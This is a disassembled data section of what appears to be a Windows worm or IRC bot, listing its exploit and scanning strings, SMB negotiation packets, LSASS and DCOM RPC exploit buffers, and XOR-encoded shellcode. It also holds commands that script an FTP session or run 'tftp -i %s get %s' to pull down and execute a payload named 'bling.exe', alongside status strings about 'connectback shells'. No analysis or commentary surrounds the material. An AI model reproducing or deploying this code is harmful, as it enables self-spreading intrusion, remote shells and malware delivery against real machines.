dd 1AC6C091h, 7BDC9D5Eh, 0C7C6C070h, 0DF125412h, 485A9ABDh
dd 0AA589A78h, 9112FF50h, 9A85DF12h, 9B78585Ah, 9912589Ah
dd 63125A9Ah, 5F1A6E12h, 0F3491297h, 0E571C09Ah, 1A999999h
dd 0CFCB945Fh, 0C365CE66h, 9DF34112h, 99F071C0h, 0C9C99999h
dd 98F3C9C9h, 0CE669BF3h, 5E411269h, 9E999B9Eh, 1059AA24h
dd 89F39DDEh, 0CE66CACEh, 0CA98F36Dh, 0C961CE66h, 0CE66CAC9h
dd 0DD751A65h, 42AA6D12h, 10C089F3h, 627B1785h, 10A1DF10h
dd 0DF10A5DFh, 0B5DF5ED9h, 99999898h, 0C989DE14h, 0CACACACFh
dd 0CACA98F3h, 0FAA5DE5Eh, 1499FDF4h, 0CAC9A5DEh, 0C97DCE66h
dd 0AA71CE66h, 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h
dd 5A59AA77h, 66676271h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h
dd 99EAEAFCh, 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh
dd 0C9EDF0E1h, 0FCFAF6EBh, 0D599EAEAh, 0D5FDF8F6h, 0F8EBFBF0h
dd 99D8E0EBh, 0C6ABEAEEh, 0CE99ABAAh, 0F6CAD8CAh, 0EDFCF2FAh
dd 0F0FB99D8h, 0F599FDF7h, 0FCEDEAF0h, 0FAF899F7h, 0EDE9FCFAh
dd 99h
aTotalDInS_ db ' Total: %d in %s.',0 ; DATA XREF: sub_40B90E+86�o
align 4
dword_431B88 dd 25370320h, 203A0373h, 2C6425h ; DATA XREF: sub_40B90E+46�o
unk_431B94 db 2Dh ; - ; DATA XREF: sub_40B90E+11�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aExploitStatist db 'Exploit Statistics:',0
unk_431BB4 db 2Dh ; - ; DATA XREF: sub_40B9DD+38�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
db 54h ; T
db 72h, 61h, 6Eh
db 73h ; s
db 66h, 65h, 72h
db 20h
db 53h, 74h, 61h
db 74h ; t
db 69h, 73h, 74h
db 69h ; i
db 63h, 73h, 3Ah
db 20h
db 2, 54h, 46h
db 54h ; T
db 50h, 2, 3Ah
db 20h
db 25h, 64h, 2Ch
db 20h
db 2, 46h, 54h
db 50h ; P
db 2, 3Ah, 20h
aDTotalDInS_ db '%d, Total %d in %s.',0
unk_431BFC db 2Dh ; - ; DATA XREF: sub_40BA49+22�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aDConnectbackSh db '%d connectback shells in %s.',0
align 4
aScanTimeS_ db ' Scan Time: %s.',0 ; DATA XREF: sub_40BA9E+7F�o
dword_431C38 dd 25370320h, 28200373h, 73253403h, 2C2903h ; DATA XREF: sub_40BA9E+40�o
dword_431C48 dd 234032Dh, 6E616373h, 202D0302h, 6C707845h, 2074696Fh
; DATA XREF: sub_40BA9E+14�o
dd 7473694Ch, 3Ah
unk_431C64 db 2Dh ; - ; DATA XREF: sub_40BB65+172�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
aFinishedExploi db '- finished exploiting %s (%d attempts)',0
unk_431C98 db 2Dh ; - ; DATA XREF: sub_40BB65+80�o
db 3, 34h, 2
db 65h ; e
db 78h, 70h, 6Ch
db 6Fh ; o
db 69h, 74h, 2
db 3
db 2Dh, 20h, 74h
db 72h ; r
db 79h, 69h, 6Eh
db 67h ; g
db 20h, 2, 25h
db 73h ; s
db 2, 20h, 6Fh
aNSPortD___ db 'n %s (port %d)...',0
align 4
unk_431CC8 db 2Dh ; - ; DATA XREF: sub_40BD1A+42�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanNotActive_ db 'Scan not active.',0
align 4
unk_431CE8 db 2Dh ; - ; DATA XREF: sub_40BD1A+2C�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aCurrentIpS_ db 'Current IP: %s.',0
unk_431D04 db 2Dh ; - ; DATA XREF: sub_40BD91+4B7�o
db 3, 34h, 2
db 68h ; h
db 2 dup(74h), 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_30 db ' Failed to start server, error: <%d>.',0
align 4
unk_431D38 db 2Dh ; - ; DATA XREF: sub_40BD91+38F�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aFailedToSta_31 db '- Failed to start server, error: <%d>.',0
unk_431D70 db 2Dh ; - ; DATA XREF: sub_40BD91+321�o
db 3, 34h, 2
db 63h ; c
db 6Fh, 2 dup(6Eh)
db 65h ; e
db 63h, 74h, 62h
db 61h ; a
db 63h, 6Bh, 2
db 3
aServerStarte_2 db '- Server started on Port: %d.',0
align 10h
unk_431DA0 db 2Dh ; - ; DATA XREF: sub_40BD91+26C�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aFailedToSta_32 db 'Failed to start server, error: <%d>.',0
align 4
unk_431DD4 db 2Dh ; - ; DATA XREF: sub_40BD91+1FE�o
db 3, 34h, 2
db 66h ; f
db 74h, 70h, 64h
db 2
db 3, 2Dh, 20h
aServerStarte_3 db 'Server started on Port: %d, File: %s.',0
align 4
unk_431E08 db 2Dh ; - ; DATA XREF: sub_40BD91+148�o
db 3, 34h, 2
db 74h ; t
db 66h, 74h, 70h
db 64h ; d
db 2, 3, 2Dh
aFailedToSta_33 db ' Failed to start server, error: <%d>.',0
align 4
unk_431E3C db 2Dh ; - ; DATA XREF: sub_40C3E8+EE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOpen db 'IP: %s, Port %d is open.',0
align 4
unk_431E64 db 2Dh ; - ; DATA XREF: sub_40C3E8+93�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSDScanThread db 'IP: %s:%d, Scan thread: %d, Sub-thread: %d.',0
unk_431E9C db 2Dh ; - ; DATA XREF: sub_40C600+1CE�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedAtSDAf db 'Finished at %s:%d after %d minute(s) of scanning.',0
align 4
unk_431EDC db 2Dh ; - ; DATA XREF: sub_40C600+173�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToStartW db 'Failed to start worker thread, error: <%d>.',0
unk_431F14 db 2Dh ; - ; DATA XREF: sub_40C600+103�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aSDScanThreadDS db '%s:%d, Scan thread: %d, Sub-thread: %d.',0
unk_431F48 db 2Dh ; - ; DATA XREF: sub_40C600+87�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedToInitia db 'Failed to initialize critical section.',0
align 4
unk_431F7C db 2Dh ; - ; DATA XREF: sub_40C85F+92�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aIpSPortDIsOp_0 db 'IP: %s Port: %d is open.',0
align 4
unk_431FA4 db 2Dh ; - ; DATA XREF: sub_40C92C+41�o
db 3, 34h, 2
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSPor db 'Scanning IP: %s, Port: %d.',0
align 4
unk_431FCC db 2Dh ; - ; DATA XREF: sub_40CA1D+D1�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aFinishedScanni db 'Finished scanning IP: %s.',0
align 4
unk_431FF8 db 2Dh ; - ; DATA XREF: sub_40CA1D+41�o
db 3, 34h, 2
db 70h ; p
db 6Fh, 72h, 74h
db 73h ; s
db 63h, 61h, 6Eh
db 2
db 3, 2Dh, 20h
aScanningIpSP_0 db 'Scanning IP: %s, Port: %d.',0
align 4
aRbrbrbrb db 'BBBB',0 ; DATA XREF: sub_40CD9E+B2�o
align 10h
dword_432030 dd 10FF8h, 0 ; DATA XREF: sub_40CD9E+6A�o
dword_432038 dd 10FF8h ; DATA XREF: sub_40CD9E+79�o
dword_43203C dd 7FFDF020h, 0 ; DATA XREF: sub_40CD9E+162�o
dword_432044 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40D1C8+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002 db 'LM1.2X002',0
dw 4C02h
aAnman2_1 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12 db ' LM 0.12',0
align 4
dword_4320CC dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40D1C8+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 2 dup(0)
dword_4320FC dd 0 ; DATA XREF: sub_40D1C8+44�o
dd 800000D4h, 0
unk_432108 db 81h ; ; DATA XREF: sub_40D2A2+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
dd 0
byte_432154 db 41h ; DATA XREF: sub_40D340+107�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 4
aSvwfbA db 'SVWfì€',0 ; DATA XREF: .text:0040D61F�o
aIcsa db '‰æèí',0
db 2 dup(0), 0FFh
dd 12096836h, 0F7E863D6h, 89000000h, 0A2E80846h, 0FF000000h
dd 6B680476h, 0E8CA2BD0h, 0E2h, 0E80C4689h, 3Fh, 680476FFh
dd 4C0297FAh, 0CDE8h, 68DB3100h, 410h, 89D0FF53h, 768B56C3h
dd 0B9C78910h, 410h, 315EA4F3h, 505050C0h, 0FF505053h
dd 468B0C56h, 0C4816608h, 5E5F0080h, 60E0FF5Bh, 23E8h
dd 24448B00h, 7C588D0Ch, 53C4383h, 284381h, 81000010h
dd 0F0002863h, 48BFFFFh, 14C48324h, 0C3C03150h, 0FF64D231h
dd 22896432h, 90B8DB31h, 31429042h, 8902B1C9h, 74AFF3DFh
dd 0F3EB4303h, 64107E89h, 6158028Fh, 20BF60C3h, 8B7FFDF0h
dd 8468B1Fh, 7F8B0789h, 78C781F8h, 89000001h, 741939F9h
dd 0EB098B04h, 39FA89F8h, 574045Ah, 0EB04528Bh, 891189F6h
dd 43C6044Ah, 0C36101FDh, 0FDF00CA1h, 1C408B7Fh, 8908588Bh
dd 8B008B1Eh, 46890840h, 8B60C304h, 8B28246Ch, 548B3C45h
dd 0EA017805h, 8B184A8Bh, 0EB01205Ah, 8B4938E3h, 0EE018B34h
dd 0C031FF31h, 0E038ACFCh, 0CFC10774h, 0EBC7010Dh, 247C3BF4h
dd 8BE17524h, 0EB01245Ah, 4B0C8B66h, 11C5A8Bh, 8B048BEBh
dd 4489E801h, 0C2611C24h, 0FEEB0008h, 0
dword_432300 dd 0F254C481h, 0E8FCFFFFh, 46h, 8B3C458Bh, 178057Ch, 184F8BEFh
; DATA XREF: .text:0040D5CD�o
dd 1205F8Bh, 492EE3EBh, 18B348Bh, 99C031EEh, 74C084ACh
dd 0DCAC107h, 0F4EBC201h, 424543Bh, 5F8BE375h, 66EB0124h
dd 8B4B0C8Bh, 0EB011C5Fh, 18B1C8Bh, 245C89EBh, 0C031C304h
dd 30408B64h, 0F78C085h, 8B0C408Bh, 8BAD1C70h, 0BE90868h
dd 8B000000h, 7C053440h, 8B000000h, 315F3C68h, 0EB5660F6h
dd 0CEEF680Dh, 986860E0h, 570E8AFEh, 0EEE8E7FFh, 0FFFFFFh
dword_432390 dd 60h ; DATA XREF: sub_40CD9E+320�o
dword_432394 dd 62B0606h, 2050501h, 0A0h ; DATA XREF: sub_40CD9E+2F5�o
dword_4323A0 dd 30h ; DATA XREF: sub_40CD9E+2CA�o
dword_4323A4 dd 0A1h ; DATA XREF: sub_40CD9E+29F�o
dword_4323A8 dd 3 ; DATA XREF: sub_40CD9E+246�o
aCccc db 'CCCC',0 ; DATA XREF: sub_40CD9E+153�o
align 4
dword_4323B4 dd 909006EBh, 90909090h, 0 ; DATA XREF: sub_40CD9E+E8�o
aCmdCEchoOpenSD db 'cmd /c echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &'
; DATA XREF: .text:0040D5F4�o
db 'echo quit >> o &ftp -n -s:o &%s',0Dh,0Ah,0
align 4
dword_432424 dd 30B0005h, 10h, 48h, 7Fh, 16D016D0h, 0 ; DATA XREF: .text:0040E02D�o
; .text:0040E167�o
dd 1, 10001h, 1A0h, 0
dd 0C0h, 46000000h, 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_432470 dd 3000005h, 10h, 3E8h, 0E5h, 3D0h, 40001h, 60005h, 1
; DATA XREF: sub_40DCF9+123�o
dd 0
dd 0FD582432h, 496445CCh, 0AEDD70B0h, 0D2962C74h, 0D5E60h
dd 1, 0
dd 0D5E70h, 2, 0D5E7Ch, 0
dd 10h, 0F1F19680h, 11CE4D2Ah, 20006AA6h, 0F4726EAFh, 0Ch
dd 4252414Dh, 1, 0
dd 0BAADF00Dh, 0
dd 0BF4A8h, 2 dup(360h), 574F454Dh, 4, 1A2h, 0
dd 0C0h, 46000000h, 338h, 0
dd 0C0h, 46000000h, 0
dd 330h, 328h, 0
dd 81001h, 0CCCCCCCCh, 0C8h, 574F454Dh, 328h, 0D8h, 0
dd 2, 7, 4 dup(0)
dd 0CD28C4h, 0CD2964h, 0
dd 7, 1B9h, 0
dd 0C0h, 46000000h, 1ABh, 0
dd 0C0h, 46000000h, 1A5h, 0
dd 0C0h, 46000000h, 1A6h, 0
dd 0C0h, 46000000h, 1A4h, 0
dd 0C0h, 46000000h, 1ADh, 0
dd 0C0h, 46000000h, 1AAh, 0
dd 0C0h, 46000000h, 7, 60h, 58h, 90h, 40h, 20h, 78h, 30h
dd 1, 81001h, 0CCCCCCCCh, 50h, 2088B64Fh, 0FFFFFFFFh, 13h dup(0)
dd 81001h, 0CCCCCCCCh, 48h, 660007h, 20906h, 0
dd 0C0h, 46000000h, 10h, 2 dup(0)
dd 1, 0
dd 0C1978h, 58h, 60005h, 1, 9398D870h, 11D24F98h, 57BE3DA9h
dd 0B2h, 310032h, 81001h, 0CCCCCCCCh, 80h, 0BAADF00Dh
dd 4 dup(0)
dd 144318h, 0
dd 2 dup(60h), 574F454Dh, 4, 1C0h, 0
dd 0C0h, 46000000h, 33Bh, 0
dd 0C0h, 46000000h, 0
dd 30h, 10001h, 317C581h, 4AE90E80h, 8AF19999h, 857A6F50h
dd 2, 5 dup(0)
dd 1, 81001h, 0CCCCCCCCh, 30h, 6E0078h, 0
dd 0DDAD8h, 2 dup(0)
dd 0C2F20h, 2 dup(0)
dd 3, 0
dd 3, 580046h, 0
dd 81001h, 0CCCCCCCCh, 10h, 2E0030h, 4 dup(0)
dd 81001h, 0CCCCCCCCh, 68h, 0FFFF000Eh, 0B8B68h, 2, 3 dup(0)
dword_4327D4 dd 20h, 0 ; DATA XREF: sub_40DCF9+136�o
dd 20h, 5C005Ch, 0
off_4327E8 dd offset aLafler ; DATA XREF: sub_40DCF9+15D�o
; "Lafler"
a12345611111111:
unicode 0, <$\123456111111111111111.doc>,0
align 8
dword_432828 dd 81001h, 0CCCCCCCCh, 20h, 2D0030h, 0 ; DATA XREF: sub_40DCF9+174�o
dd 0C2A88h, 2, 1, 0C8C28h, 1, 7, 2 dup(0)
aFxnbfxfxnbfxfx: ; DATA XREF: sub_40DCF9+45�o
unicode 0, <FXNBFXFXNBFXFXFXFX>
dd 0FFFFFFFFh, 2 dup(7FFDE0CCh), 0
aRrrrrrrrrrrrrr db ''
db ''
db '',0
dword_432938 dd 10016C6h ; DATA XREF: sub_40DCF9+104�o
dword_43293C dd 100139Dh ; DATA XREF: sub_40DCF9+FB�o
asc_432940: ; DATA XREF: sub_40DB5E+1C�o
; sub_40DC41+16�o
unicode 0, <\\>,0
align 4
off_432948 dd offset dword_49005C ; DATA XREF: sub_40DB5E+C�o
; sub_40DC41+B�o
dd offset aLallemant+8
dd 24h
aSExploitingIpS db '[%s]: Exploiting IP: %s.',0 ; DATA XREF: .text:0040E235�o
; .text:0040E99E�o ...
align 10h
aTftpFileTransf db '[TFTP]: File transfer complete to IP: %s',0 ; DATA XREF: .text:0040E1E8�o
align 4
aSPipeEpmapper db '\\%s\pipe\epmapper',0 ; DATA XREF: .text:0040DF8D�o
align 10h
dd 4B5B10EBh, 0B966C933h, 34800125h, 0FAE2990Bh, 0EBE805EBh
dd 70FFFFFFh, 99999962h, 0A938FDC6h, 12999999h, 0E91295D9h
dd 0F1123485h, 0F36E1291h, 271C09Dh, 7B999999h, 0ABAAF160h
dd 0EEF19999h, 0CDC6ABEAh, 71128F66h, 71C09DF3h, 9999991Bh
dd 7518607Bh, 99999809h, 9898F1CDh, 0CF669999h, 0C9C9C989h
dd 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h, 0F1989999h, 4B9D999Bh
dd 89F35512h, 0CF66CAC8h, 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh
dd 0CD751AA9h, 0F3BDA514h, 7B32C08Ch, 0BDDD5F64h, 0DD67DD89h
dd 0C510A4BDh, 0C510D1BDh, 0C510D5BDh, 0DD14C9BDh, 0C9CD89BDh
dd 0F3C8C8C8h, 66C8C898h, 66C8A9EFh, 55129DCFh, 0A86666F3h
dd 0CA91CF66h, 6685CF66h, 0CFC895CFh, 12A5DC12h, 9AE1B1CDh
dd 0EB12CB4Ch, 0AA6C9AB9h, 34D8D050h, 42AA5C9Ah, 0A3892796h
dd 5891ED4Fh, 439A9452h, 0A26872D9h, 0C37EEC86h, 9ABDC312h
dd 9512FF44h, 85C312D2h, 9D12449Ah, 325C9A12h, 715AC0C7h
dd 66666699h, 7597D717h, 8F2A67EBh, 579C4034h, 0F9795776h
dd 0A2657452h, 346C9040h, 0F9336075h, 0E05FE07Eh, 0
dword_432AF0 dd 4A5A10EBh, 0B966C933h, 3480017Dh, 0FAE2990Ah, 0EBE805EBh
; DATA XREF: sub_40E3F1+156�o
; sub_40E3F1+212�o
dd 70FFFFFFh, 99999895h, 0A938FDC3h, 12999999h, 0E91295D9h
dd 0D9123485h, 12411291h, 0ED12A5EAh, 6A9AE187h, 9AB9E712h
dd 8DD71262h, 0CECF74AAh, 9AA612C8h, 0F36B1262h, 3F6AC097h
dd 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh, 125412C7h, 5A9ABDDFh
dd 589A7848h, 12FF50AAh, 85DF1291h, 78585A9Ah, 12589A9Bh
dd 125A9A99h, 1A6E1263h, 4912975Fh, 71C09AF3h, 9999991Eh
dd 0CB945F1Ah, 65CE66CFh, 0F34112C3h, 0ED71C09Ch, 0C9999999h
dd 0F3C9C9C9h, 669BF398h, 411275CEh, 999B9E5Eh
dword_432BA0 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40E3F1+105�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_432C88 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0040E8A6�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
aLanman1_0_0 db 'LANMAN1.0',0
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
aLm1_2x002_0 db 'LM1.2X002',0
dw 4C02h
aAnman2_1_0 db 'ANMAN2.1',0
db 2, 4Eh, 54h
aLm0_12_0 db ' LM 0.12',0
align 4
dword_432D14 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040E8D2�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_432DC0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040E8F9�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_432EA0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+58�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC_3: ; DATA XREF: sub_40E3F1+8A�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_432F04 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+2AA�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_432F70 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+2D1�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_433014 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+3B0�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_433094 dd offset loc_401495 ; DATA XREF: sub_40E3F1+3DE�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd offset loc_40707B+1
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_433128 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+306�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_433194 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40E3F1+331�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dword_433208 dd 0 ; DATA XREF: sub_40E3F1+35F�o
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 0
dd offset loc_40A897+3
dd 1, 0
dd 1, 2 dup(0)
word_433290 dw 0AD9Dh ; DATA XREF: sub_40E292+30�r
; sub_40E3F1+E7�r
align 4
dd 2 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_4332D0 dd 1004600h ; DATA XREF: sub_40E3F1+140�r
; sub_40E3F1+245�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
aEchoOpenSDOEch db 'echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &'
; DATA XREF: sub_40E292+BC�o
db 'echo quit >> o &ftp -n -s:o &bling.exe',0Dh,0Ah,0
align 4
aTftpISGetS db 'tftp -i %s get %s',0Dh,0Ah,0 ; DATA XREF: sub_40E292+97�o
dword_433408 dd 6EB06EBh, 0 ; DATA XREF: sub_40E3F1+177�o
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_40E3F1+27�o
align 4
dword_43341C dd 1CEC8166h ; DATA XREF: sub_40E3F1+D�r
dword_433420 dd 0E4FF07h ; DATA XREF: sub_40E3F1+16�r
dword_433424 dd 200F1001h, 0Ah, 1001802h, 0 ; DATA XREF: sub_40EAE9+5A�o
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
